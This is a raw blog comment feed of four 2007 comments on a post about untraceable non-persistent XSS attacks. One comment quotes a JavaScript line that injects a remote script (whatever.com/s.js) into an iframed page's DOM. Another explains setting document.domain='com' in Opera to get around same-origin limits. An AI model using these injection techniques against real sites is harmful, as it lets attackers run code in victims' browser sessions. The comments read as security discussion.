tag:blogger.com,1999:blog-23714519.post5777782690565278765..comments2023-10-18T02:14:08.061+11:00Comments on Alex's Corner: (Non-Persistent) Untraceable XSS Attackskuza55http://www.blogger.com/profile/03932544559060480887noreply@blogger.comBlogger4125tag:blogger.com,1999:blog-23714519.post-5130022722488818082007-03-31T05:31:00.000+10:002007-03-31T05:31:00.000+10:00Would it work if you attach a remote javascript to...Would it work if you attach a remote javascript to the DOM and then use ajax to perform actions on the iframed domain?<BR/><BR/>I'm using "d = frames[0].document;<BR/>x=d.createElement('script');x.src="http://www.whatever.com/s.js";d.body.appendChild(x)"<BR/>In s.js I call an xmlhttp function but in firefox I receive an error "Error: uncaught exception: Permission denied to call method XMLHttpRequest.open".Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-23714519.post-11686090006467433592007-03-30T20:42:00.000+10:002007-03-30T20:42:00.000+10:00Thanks, that's a nice writeup. Just a not: this tr...Thanks, that's a nice writeup. Just a not: this trick *does* work in Opera. You simply use document.domain='com', without any trailing dot tricks.Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-23714519.post-25845277748605297022007-03-30T19:25:00.000+10:002007-03-30T19:25:00.000+10:00dude, you helped me a freakin' lot :-)check out my...dude, you helped me a freakin' lot :-)<BR/><BR/>check out mybeNi.tk on saturday eveningAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-23714519.post-37078987008952860102007-03-30T14:02:00.000+10:002007-03-30T14:02:00.000+10:00now Alex, thats a very very smart technique though...now Alex, thats a very very smart technique though. Good one.<BR/><BR/>http://hackathology.blogspot.comAnonymousnoreply@blogger.com